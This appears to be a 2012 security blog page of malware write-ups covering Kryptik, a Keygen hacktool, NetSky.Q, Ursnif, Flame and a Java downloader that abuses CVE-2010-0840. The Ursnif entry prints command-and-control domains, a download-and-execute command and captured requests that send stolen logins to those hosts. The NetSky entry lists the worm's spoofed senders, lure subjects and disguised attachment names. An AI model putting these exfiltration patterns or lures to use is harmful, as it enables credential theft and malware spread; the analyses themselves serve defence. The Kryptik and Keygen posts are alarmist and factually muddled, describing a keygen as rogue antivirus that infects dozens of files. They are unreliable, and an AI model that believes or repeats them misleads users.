Showing posts with label New Virus. Show all posts
Showing posts with label New Virus. Show all posts

Saturday, October 27, 2012

Trojan.Kryptik


Trojan.Kryptik

Trojan.Kryptik is a horrible Trojan that will cause you many computer problems as well as vast amounts of irritation.Trojan.Kryptik basically is a generic detection geared towards a very dangerous Trojan that has the ability to create itself again and again.Trojan.Kryptik has very terrifying risk factors to it,with the inclusion of infecting all computers who make use of the Windows operating system. As you can imagine, this means that the majority of the world that uses computer are at risk of being infected by Trojan.Kryptik.

Trojan.Kryptik may go by the following names:
• TrojanKryptik
• Trojan Kryptik

Trojan.Kryptik may display the following symptoms:
• Your computer may decrease in speed.
• You may experience vast amounts of pop ups.
• You may find unclassified processes running in Task Manager.
• Your browsing performance may decrease in speed.
• Files may re install themselves even after removal.
• File may appear and disappear without you having done anything.

Trojan.Kryptik is extremely malicious due to the factor that it is able to actually reinstall its files after being deleted. The fundamental problem with this is that it causes the manual removal process to be extremely hard.Trojan.Kryptik is able to actually also hide itself in running processes on your machine as well as create multiple dangerous files on your system.Trojan.Kryptik is able to block any computer security related applications which you may have running on your machine.Trojan.Kryptik is also able to prevent security applications from entering the quarantine process as well as being able to prevent some of its files from updating on the definition database.

Trojan.Kryptik will only cause you problems and is better avoided. If you suspect that you may have running on your Trojan.Kryptik machine, then you need to remove it immediately. You have the option of the manual removal process or alternatively the automatic removal process. You need to be aware of the factor that if you decide to choose the manual removal process, the risks are high of you causing even more additional damage to your computer. It is seriously within your best interest to make use of the automatic removal process, which will both detect as well as remove Trojan.Kryptik for you. Remember to use an up to date, reliable and user friendly spyware removal tool.


Thursday, October 18, 2012

About The HackTool

About The HackTool:Win32/Keygen

Computer virus is extremely dangerous for the health of the computer. It can exploit the working of your computer system. If you detect problems in working on your system then definitely your system is infected with harmful virus. HackTool:Win32/Keygen is classified as harmful virus which is one of creation of remote hackers. As it name implies, it hacks your system and steal the sensitive data without the users knowledge or consent. It leaves malicious codes in the system and records all your browsing activity.
HackTool:Win32/Keygen is evolved and expanded. It has infected millions of computer globally. It is also able to download additional virus and tries to take over all the system. CRCK_KEYGEN, Troj/Keygen, not-a-virus Keygen are its common aliases. It is a tricky virus which cannot be trusted. Actually it promotes its antivirus program. It have capability to disable your updated antivirus. When you scan your system it displays fake scanning reports and tactics on you to buy its licensed version. If it trace your system then you would have to suffer with great data loss. So try to stop it in its early phase. It is strongly recommended don’t avoid its presence. Remove it quicky by using powerful tool.
Number of Infections of HackTool:Win32/Keygen: HackTool:Win32/Keygen is very lethal and propagates very vigorously. According to experts, it could infects as many as 60 files at a time which is quite high.
Operating System platforms infected by HackTool:Win32/Keygen: HackTool:Win32/Keygen is equally dangerous for all the Windows System. Windows Operating System including Windows XP, Vista, Windows 7 etc are the soft targets of HackTool:Win32/Keygen infection.
Through Email attachments:
Freeware downloads and social plug-ins:
Through social file sharing:
Visiting Porn and Malicious sites:
Below given guidelines can help you to prevent the entrance of HackTool:Win32/Keygen like infections on the Windows system:
Use Advance System Security Software: To maintain the system running effectively without any interruption, it is mandatory to use highly advance system security programs which can prevent the unauthorized access.
Enable Firewall Settings: By enabling the firewall settings option on Windows system, you will be able to stop the access of malicious computer threat which are trying to gain access on the user computer.
Make use of Strong passwords over Network: The use of strong passwords are very much recommended to maintain the security of system.
Avoid Freeware and Shareware Downloads: It is necessary that you should avoid downloading fareware and shareware program from web. It is because many of the addware and malware programs enters to the PC without any user knowledge with the files related with the program.
Take Caution While Opening Attachments: It is suggested to avoid opening the attachments coming from untrusted source. If you are opening such files then you should require to first scan the entire system using effective anti-virus program.
  

Tuesday, October 16, 2012

Win32/NetSky.Q

Win32/NetSky.Q

Win32/NetSky.Q is an internet worm spreading via e-mail messages, P2P networks or shared network drives.
Note: In following text a symbolic inscription %windir% is used instead of the name of directory in which Windows operating system is installed. Of course, this may differ from installation to installation. The subdirectory System or System32 placed in %windir% has a name %system%
The worm is in an executable that is nearly 29 kiobytes long. Upon execution it copies itself into the %windir% directory using the name "FVProtect.exe".
It also creates a file called "userconfig9x.dll", that is 26 kB long. This dynamic library file is then executed.

In order to be run every time the Windows starts, the worm creates Registry entry called "Norton Antivirus AV" in the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

The new entry contains the path to "FVProtect.exe".

The following Registry entries are removed by the worm:
HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\PINF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\au.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d3dupdate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\direct.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Explorer
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gouday.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OLE
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\srate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Taskmon
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Services Host
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winupd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\System.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\Video
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DELETE ME
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\direct.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jijbl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msgsvr32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sentry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\service
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Taskmon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\video
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Services Host
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winupd.exe
This way, some older worms can be deactivated, if present on the system.

The following files are created in the %windir% directory: base64.tmp, zip1.tmp, zip2.tmp, zip3.tmp, zipped.tmp.
These are used when the e-mail messages are composed.

The worm searches all local disks for directories, that contain some of the following strings in their names:
bear
donkey
download
ftp
htdocs
http
icq
kazaa
lime
morpheus
mule
my shared folder
shar
shared files
upload
The messages used for spreading the worm are composed using a long list of strings. The address of the sender is either randomly picked from the harvested addresses, or it may be one of the addresses contained in the worm:
abuse@gov.us
noreply@paypal.com
support@symantec.com
Subject of the message is chosen from the list below:
-do0-i4grjj40j09gjijgp
0i09u5rug08r89589gjrg
Administrator
approved
Congratulations!
corrected
Do you?
Body of the e-mail contains one of the following messages, but it can also be blank.
9u049u89gh89fsdpokofkdpbm3-4i
Are you a spammer? (I found your email on a spammer website!?!)
Authentication required.
Bad Gateway: The message has been attached.
Best wishes, your friend.
Binary message is available.
Can you confirm it?
Congratulations!, your best friend.
Delivered message is attached.
Do not visit this illegal websites!
Encrypted message is available.
The attachment can either be an executable or a ZIP archive. If it's an EXE file, it has two extensions. The first one is either ".doc" or ".txt",
and the other is ".exe", ".scr" or ".pif".

If the attachment is a ZIP archive, its extension is ".zip". The archive contains the Win32/Netsky.Q executable. The file inside the archive can have three different names:
document.txt .exe
data.rtf .scr
details.txt .pif



Trojan.Spy.Ursnif.F

Trojan.Spy.Ursnif.F


Spreading: medium
Damage: high
Size: approx 50k
Discovered: 2010 Oct 20

SYMPTOMS:
Extra http traffic.
TECHNICAL DESCRIPTION:
      Trojan.Spy.Ursnif is a malware that is able to steal personal information and control the infected computer.
      It finds out the type of browser (iexplorer, firefox, safari, chrome, opera), information used later for stealing specific passwords.
It takes a snapshot of all the processes and injects itself to iexplore or firefox and also hooks some functions: InternetReadFile,
InternetWriteFile, CreateProcess, HttpSendRequest  to intercept browser trafic.   
     The backdoor behaviour starts when it connects to a server that appers with diffrent host names : rettinasl.com, hasterulits.com, thecargotime.com, tryfindithere.com. From time to time it sends requests to the server. The request has a standard form:
    GET /cgi-bin/cmd.cgi?user_id=2806922672&version_id=2037028&passphrase=fkjvhsdvlksdhvlsd&socks=0&version=2037028&crc=00000000 HTTP/1.1

    The version id is memorized in a registry key:    
        Subkey = HKCU\Software\AppDataLow\{0a7cdb08-42c7-a17a-bc91-b0554eeb624f}
        Value    = Version
        Data      = Hex:001F1524 , Decimal:2037028
    The user_id is random.

    If the request succeeds and the connection is established the malware takes control:
      - it receives commands:
            - download               - DL_EXE=http://ne[removed].cn/sol.exe /DL_EXE_ST=http://ne[removed].cn /sol.exe ;
            - kill windows           - KILL (writes in "\\.\C:" a 0x10000 size buffer( the module of the current    process));
            - reboot system        - REBOOT;
             - take screenshots - SCREENSHOT;
            - delete cookies       - CLEAR_COOK;

      - when the user logs on diffrent internet accounts it sends the private information (user_name,passwords) to a remote location:
            example wireshark capture:

            POST /cgi-bin/forms.cgi HTTP/1.1
            Content-Type: multipart/form-data; boundary=--------------------------2b01852b01852b0185
            User-Agent: IE
            Host: tryfindithere.com
            Content-Length: 337
            Cache-Control: no-cache
            ----------------------------2b01852b01852b0185
            Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
            Content-Type: application/octet-stream
             URL: http://fa[removed]war.com/index.php
            login_username=TEST&login_password=TEST&serverid=1&submitit.x=89&submitit.y=23
     
        - it downloads an encrypted buffer to a memory location that contains :
            - the names of some bank websites : millenniumbcp.pt , santandertotta.pt, grupobanif, caixaebanking.cgd.pt;
            - some javascript code to identify and steal passwords, user names, card pins from those bank websites;
  
        - also when the user logs on those bank websites, screenshot pictures are send to a remote location :
            example wireshark capture:
         
            POST /cgi-bin/ss.cgi HTTP/1.1
            Content-Type: multipart/form-data; boundary=--------------------------905c4c905c4c905c4c
            User-Agent: IE
            Host: thecargotime.com
            Content-Length: 146030
            Cache-Control: no-cache
            ----------------------------905c4c905c4c905c4c
            Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
            Content-Type: application/octet-stream
  
       It creates events with restricted rights: denied for guest and anonymouse users ( D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)).
       Every action is executed by threads that are syncronized using critical sections or events.
        It uses a pipe for communication between threads (read/write).

Trojan.Flame.A

Trojan.Flame.A

Spreading: medium
Damage: very high
Size: ~20MB
Discovered: 2012 May 28

SYMPTOMS:
Presence of the following files:
%windir%\\system32\\commgr32.dll
%windir%\\system32\\comspol32.dll
%windir%\\system32\\comspol32.ocx
%windir%\\system32\\indsvc32.dll
%windir%\\system32\\indsvc32.ocx
%windir%\\system32\\modevga.com
%windir%\\system32\\mssui.drv
%windir%\\system32\\scaud32.exe
%windir%\\system32\\sdclt32.exe
%windir%\\system32\\watchxb.sys
%windir%\\system32\\winconf32.ocx
Presence of this directory:
%COMMONPROGRAMFILES%\\Microsoft Shared\\MSSecurityMgr\\
TECHNICAL DESCRIPTION:
This is a multi-component malware for targeted attacks. It is able to spy, leak data, download/execute other components.

Please let Bitdefender disinfect your files.
You can also download our removal tool:
http://labs.bitdefender.com/2012/05/cyber-espionage-reaches-new-levels-with-flamer/

New Virus Attack ! Java Trojan Downloader

Java.Trojan.Downloader.OpenConnection.AI is a malicious Java applet that downloads and executes arbitrary files. In the wild, it can be found as a Java archive. The malicious HTML passes the encrypted URL of the file to download and execute as the parameter a to the applet. The applet uses the CVE-2010-0840 exploit to bypass the Java sandbox.
 
The JAR file contains four class files in the bpac package:
  • KAVS.class;
  • a$1.class;
  • a.class - the applet;
  • b.class - the URL decrypter.
The applet starts out by generating a random name for the executable under the system temporary directory. The name is made up entirely of random digits and has the extension ".exe" appended.
Next, it checks whether the operating system is Windows, by searching for the string Windows in the os.name system property.
If the OS checks out, the applet downloads the file and executes it with a call to Runtime#exec.
The code is somewhat obfuscated, for example, the names of the system properties java.io.tmpdir and os.name appear reversed.
 
We have observed two variants of the decrypter:
  1. One performs a series of single-character replacements on the URL, then appends
    the string "?i=1".
  2. The other one is a bit more complex, it assumes the URL isn’t encrypted at all, and duplicates some of the applet’s code. It downloads the file at the given URL, assumes it’s a PE executable and checks the Characteristics field of the IMAGE_FILE_HEADER for 0x2000, i.e., IMAGE_FILE_DLL.
    It generates a random name made up of digits for the executable, under the system temporary directory, it appends the proper extension taking into account whether the file is a DLL or an EXE. If it’s an EXE, it executes it with a call to Runtime#exec, just like the applet does, if it’s a DLL, it registers it using regsvr32.